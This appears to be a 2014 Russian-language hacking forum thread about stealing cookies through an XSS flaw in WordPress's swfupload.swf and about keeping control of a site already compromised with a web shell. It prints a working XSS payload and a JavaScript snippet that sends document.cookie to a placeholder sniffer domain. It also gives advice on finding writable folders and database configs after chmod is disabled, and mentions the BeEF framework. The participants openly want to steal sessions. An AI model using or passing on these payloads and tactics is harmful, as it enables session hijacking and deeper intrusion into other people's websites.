03.03.2014, 20:22
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
это понятно)прописываю
Код:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов. .Но что нужно залить?непосредственно js со сниффером? |
|
|
03.03.2014, 20:51
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от CoolHucker
это понятно)прописываю
Код:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//
даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов.
.Но что нужно залить?непосредственно js со сниффером?Ну в интернете тема с XSS изъезженна.
Примитивный JS код:
Код:
img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;
|
|
|
|
03.03.2014, 20:57
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Сообщение от None
Ну в интернете тема с XSS изъезженна.
Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?
|
|
|
|
03.03.2014, 20:59
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от CoolHucker
Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?
Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.
А так нужно выполнить код в рамках XSS (Именно там где алерт).
|
|
|
|
03.03.2014, 21:02
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Сообщение от None
Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.
А так нужно выполнить код в рамках XSS (Именно там где алерт).
почитал)вроде понял) благодарю
|
|
|
|
03.03.2014, 23:32
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Подскажите.
Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?
|
|
|
|
04.03.2014, 00:11
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Грабитель
Подскажите.
Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?
как вариант попробовать изменить дефолтное значение чмод, которая описана вроде в системном файле
|
|
|
|
05.03.2014, 13:16
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?
Сообщение от None
img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;
|
|
|
|
05.03.2014, 19:24
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от None
Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?
Едва ли вообще все закрыто, если сайты не статичны. Загрузка хлама в админках, кеш и прочая фигня обычно доступны для записи. Ищите конфиги от баз и админок, попробуйте пройти через бд.
Сообщение от None
Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?
Годный сниффер реализуется одним лишь веб-сервером. Никакой пхп тут не нужен. Для кук ничего больше не нужно, но, возможно, есть смысл посмотреть в сторону beef.
|
|
|
|
06.03.2014, 15:16
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Можно конкретно дать ссылку на онлайн сниффер?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
